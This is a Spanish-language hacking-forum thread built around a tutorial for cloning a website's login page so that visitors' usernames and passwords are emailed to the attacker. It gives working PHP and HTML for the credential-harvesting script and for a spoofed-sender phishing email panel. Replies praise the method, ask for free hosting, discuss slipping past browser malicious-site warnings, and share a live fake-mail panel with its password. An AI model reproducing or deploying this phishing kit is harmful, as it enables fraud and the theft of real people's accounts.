Buenos dias/tardes/noches.
Os traigo un pequeño tutorial de como hacer phishing, aclaro que he seleccionado una pagina aleatoria.
Lo primero es irnos a la contraseña y darle a inspeccionar elemento.
(http://i.gyazo.com/7dca065446a4d5d36fe18f7f8401af7a.png)
Buscamos el form y le añadimos un action="scam.php"
(http://i.gyazo.com/aba5e3fd9bd0d3f52e9432d8742d384b.png)
Copiamos el codigo html en un archivo html y con codificacion UFT-8
En la misma carpeta donde tenemos el archivo html creamos un php con el siguiente codigo (en UFT-8 tambien):
<?php
$user = trim($_POST['el name del input del user']);
$password = trim($_POST['el name del input de pass']);
$correoreceptor = "aquí cámbialo y pon tu correo";
$asunto = "Ha caido una nueva víctima";
$mensaje = "Usuario: ".$user." - Contraseña: ".$password;
mail($correoreceptor, $asunto, $mensaje);
header('Location: Pagina real');
?>
Ya solo hace falta buscar un host gratis y subirlo todo
Asi quedaria la pagina falsa
(http://i.gyazo.com/0135b6e72db51139792dbc4768644ec1.png)
Y nos mandaria todos los logs a nuestro correo electronico :)
EDITO
He tenido varios problemas de los cuales solo aviso y no voy a explicar como librarse.
1º css en archivo en lugar de en html, tendreis que descargarlo para que la pagina quede exactamente igual.
2º script para impedir escribir en <input name="password"> en caso de estar en otra web, tendreis que borrar el script.
EDITO
Voy a explicar como hacer un panel para que mande un correo a donde tu quieras (Se suele usar mucho en el phishing)
lo primero es el codigo html al que llamaremos index.html
<html>
<head>
</head>
<body>
<div>
<h1>Phishing Pagina</h1>
<p>Correo al que desea enviar el email:</p>
<form action="correof.php" method="post">
<input name="correof" type="text">
<button type="submit">Enviar</button>
</form>
</div>
</body>
</html>
Creamos un .php con este codigo (se llamara correof):
<?php
$correoreceptor = trim($_POST['correof']);
$asunto = "Asunto del correo";
$mensaje = 'Codigo html del cuerpo';
$cabeceras = 'MIME-Version: 1.0' . "\r\n";
$cabeceras .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$cabeceras .= 'From: Nombre del que se envia <Correo del que se envia>' . "\r\n";
mail($correoreceptor, $asunto, $mensaje, $cabeceras);
?>
También me pueden seguir en Twitter si les hace ilusión: @RoloMijan (https://twitter.com/RoloMijan)
Saludos
Gracias por el tutorial.
Sencillo pero más de uno caerá en algo así.
buen post, algo por donde comenzar.
Toda una pasada el code si que esta bueno :D gracias
genial bro, sencillo, rapido y eficaz, estupendo trabajo, gracias por compartirlo, saludos
Modificado explicando como hacer un panel.
Hubiera sido bueno un vídeo para los novatos.
Pero de todas maneras excelente 8)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Hubiera sido bueno un vídeo para los novatos.
Pero de todas maneras excelente 8)
Intente explicar de forma que cualquier persona que no sepa entendiera, si tienes algun problema contactame.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Hubiera sido bueno un vídeo para los novatos.
Pero de todas maneras excelente 8)
;)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Hubiera sido bueno un vídeo para los novatos.
Pero de todas maneras excelente 8)
;)
No creo que a la gente les sea muy util si no compartes el run.bat
Otra cosa es que en lugar de direccionar a forbiden 403 podrias redireccionar a la pagina real para que crea que ha sido un error y entonces entre normalmente.
Mira por donde va a haber un segundo Facebook jajaja excelente tutorial. ]
Enviado desde mi LG-E400 usando Tapatalk 2
Gracias bro, simple pero más de uno cae, saludos.
Buena info.! esa es la idea básica de un Scam, el resto es pura imaginación...
Muy buen aporte!
¿Alguien podría decirme algún host gratuito recomendable?
Saludos.
Yo el año pasado me pasaba el dia haciendo esto jajaja. Estos fakes son muy útiles para robarte unas cuentas.
Yo tengo hecho un panel para enviar emails: Infzonne.esy.es (http://infzonne.esy.es)
Tiene contraseña, que es... : Underc0deano
Si lo se... original.
Provadlo y me decis.
: D
Bueno, mas que un panel de control para phishing es un fake email :D
hola amigos soy nuevo en este grupo pero empiezo así tengo scrips de phishing el cual aceptan solo cualquiera no verdaderos pero e visto que hay scrip de phishing que solo aceptan veradaderos como seria para configurarlos espero que respondan pronto
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
hola amigos soy nuevo en este grupo pero empiezo así tengo scrips de phishing el cual aceptan solo cualquiera no verdaderos pero e visto que hay scrip de phishing que solo aceptan veradaderos como seria para configurarlos espero que respondan pronto
Por favor,edita tu post y redacta un texto que se entienda, qué es lo que tienes y qué quieres. El foro tiene corrector ortográfico también.
Es casi ilegible/incomprensible lo que has escrito.
Leer (https://underc0de.org/foro/dudas-generales-121/(actualizado)-como-realizar-dudas-bien-redactadas-28836/)
Gracias
Gabriela
hola buenas estos phishing
¿son detectados por google chrome como pagina maliciosa?
no tendría ningún sentido hacer lo pasos lograr montarlo en un servidor gratuito
para que al final cuando se lo envíes ala victima salga pagina maliciosa
ya que ninguna persona caería en la trampa
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
hola buenas estos phishing
¿son detectados por google chrome como pagina maliciosa?
no tendría ningún sentido hacer lo pasos lograr montarlo en un servidor gratuito
para que al final cuando se lo envíes ala victima salga pagina maliciosa
ya que ninguna persona caería en la trampa
Si lo haces de una página estilo Twitter o Facebook, lo más seguro es que lo detecte, pero igual seguro haciendo algunas modificaciones se puede hacer que no lo detecte.
excelente! me ha servido casi todo solo que al loggear no me llega ningun correo con la info... ayuda :(
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
excelente! me ha servido casi todo solo que al loggear no me llega ningun correo con la info... ayuda :(
Si es host gratis, verifica que tengas opción para poder enviar correos y si puedes enviar correos entones sera cuestión de configuración.
Saludos!!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Gracias por el tutorial.
Sencillo pero más de uno caerá en algo así.
muy bien detallado.